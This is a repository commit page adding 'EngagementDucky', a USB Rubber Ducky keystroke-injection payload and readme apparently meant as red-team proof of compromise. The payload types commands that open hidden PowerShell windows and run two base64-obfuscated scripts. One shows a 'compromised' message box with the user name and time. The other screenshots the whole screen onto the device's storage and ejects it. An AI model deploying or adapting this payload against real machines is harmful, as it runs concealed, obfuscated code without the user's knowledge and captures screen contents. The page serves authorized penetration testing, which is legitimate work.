hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #169 from 0iphor13/master 

Uploaded EngagementDucky
pull/171/head
hak5glytch 2022-10-26 12:07:50 -07:00 committed by GitHub
parent cc0839f937 4c559b8047
commit 0820051a99
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 42 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
payloads/library/general/EngagementDucky/payload.txt Normal file
View File

@ -0,0 +1,21 @@
REM Defining Attackmode & USB identifiers. These will help the blue team to identify the moment of compromise
ATTACKMODE HID STORAGE VID_D3AD PID_B33F MAN_RedTeamCompany PROD_DUCKY SERIAL_25102022
REM Opening a hidden powershell instance which pops the message box
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -NoP -NonI -w h
DELAY 750
STRINGLN powershell.exe -enc JABVACAAPQAgAHcAaABvAGEAbQBpADsAJABtAD0AIgAkAFUAIABpAHMAIABjAG8AbgBzAGkAZABlAHIAZQBkACAAYwBvAG0AcAByAG8AbQBpAHMAZQBkACEAIABUAGgAaQBzACAAaQBuAGMAaQBkAGUAbgB0ACAAdwBpAGwAbAAgAGIAZQAgAHIAZQBwAG8AcgB0AGUAZAAuACIAOwAkAEwAIAA9ACAARwBlAHQALQBEAGEAdABlAA0ACgBbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAIgBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAIgApADsAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBNAGUAcwBzAGEAZwBlAEIAbwB4AF0AOgA6AFMAaABvAHcAKAAkAG0ALAAiACQATAAgAC0AIABQAHIAbwBvAGYAIABvAGYAIABDAG8AbQBwAHIAbwBtAGkAcwBlACIALAAwACwAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBNAGUAcwBzAGEAZwBlAEIAbwB4AEkAYwBvAG4AXQA6ADoARQB4AGMAbABhAG0AYQB0AGkAbwBuACkA;exit
DELAY 500
GUI r
DELAY 500
REM New powershell process for generating a proof of compromise screenshot - needs to be a seperate process because of the messagebox
STRINGLN powershell -NoP -NonI -w h
DELAY 750
STRINGLN powershell.exe -enc JABZACAAPQAoACgAZwB3AG0AaQAgAHcAaQBuADMAMgBfAHYAbwBsAHUAbQBlACAALQBmACAAJwBsAGEAYgBlAGwAPQAnACcARABVAEMASwBZACcAJwAnACkALgBOAGEAbQBlACkAOwANAAoAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgACoAbQAuACoAcwAuAEYAKgBzADsADQAKAEEAZABkAC0AdAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIAAqAG0ALgBEAHIAKgBnADsADQAKACQAUwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAFMAeQBzAHQAZQBtAEkAbgBmAG8AcgBtAGEAdABpAG8AbgBdADoAOgBWAGkAcgB0AHUAYQBsAFMAYwByAGUAZQBuADsADQAKACQAVwAgAD0AIAAkAFMALgBXAGkAZAB0AGgAOwANAAoAJABIACAAPQAgACQAUwAuAEgAZQBpAGcAaAB0ADsADQAKACQARgAgAD0AIAAkAFMALgBMAGUAZgB0ADsADQAKACQAVAAgAD0AIAAkAFMALgBUAG8AcAA7AA0ACgAkAEIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABXACwAIAAkAEgAOwANAAoAJABHACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4ARwByAGEAcABoAGkAYwBzAF0AOgA6AEYAcgBvAG0ASQBtAGEAZwBlACgAJABCACkAOwANAAoAJABHAC4AQwBvAHAAeQBGAHIAbwBtAFMAYwByAGUAZQBuACgAJABGACwAIAAkAFQALAAgADAALAAgADAALAAgACQAQgAuAFMAaQB6AGUAKQA7AA0ACgAkAEIALgBTAGEAdgBlACgAJABZACsAIgBcAFAAcgBvAG8AZgAuAGIAbQBwACIAKQA7ACQAUgBEACAAPQAgACgAZwB3AG0AaQAgAHcAaQBuADMAMgBfAHYAbwBsAHUAbQBlACAALQBmACAAJwBsAGEAYgBlAGwAPQAnACcARABVAEMASwBZACcAJwAnACkALgBOAGEAbQBlADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0ATwBiAGoAZQBjAHQAIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAE4AYQBtAGUAcwBwAGEAYwBlACgAMQA3ACkALgBQAGEAcgBzAGUATgBhAG0AZQAoACQAUgBEACkALgBJAG4AdgBvAGsAZQBWAGUAcgBiACgAJwBFAGoAZQBjAHQAJwApADsARQB4AGkAdAA=;exit
DELAY 2000
WAIT_FOR_STORAGE_INACTIVITY
ATTACKMODE OFF

BIN
payloads/library/general/EngagementDucky/proofpic.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 23 KiB

21
payloads/library/general/EngagementDucky/readme.md Normal file
View File

@ -0,0 +1,21 @@
**Title: EngagementDucky**
<p>Author: 0iphor13<br>
OS: Windows<br>
Requirements: DuckyScript 3.0<br>
Version: 1.0</p>
**What is EngagementDucky?**
#
<p>EngagementDucky will help you generating your evidence. Typical proof of compromise is normally something harmless like a message in notepad on your targets machine. This payload will pop a message box, containing Username, Hostname, Time and Date. Afterwards Ducky will generate a screenshot of this message box and will save it. Afterwards you can walk away. Combine this with specific USB identifiers to help identifying you.<br>
Step up your game and demonstrate impact in a few seconds without leaving your scope.</p>
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/usbidentifiers.png)
**Instruction:**
1. Configure USB identifiers
2. Place inject.bin onto your Ducky
3. Plug in your Ducky and wait until finish... walk away
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/proofpic.png)

BIN
payloads/library/general/EngagementDucky/usbidentifiers.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.8 KiB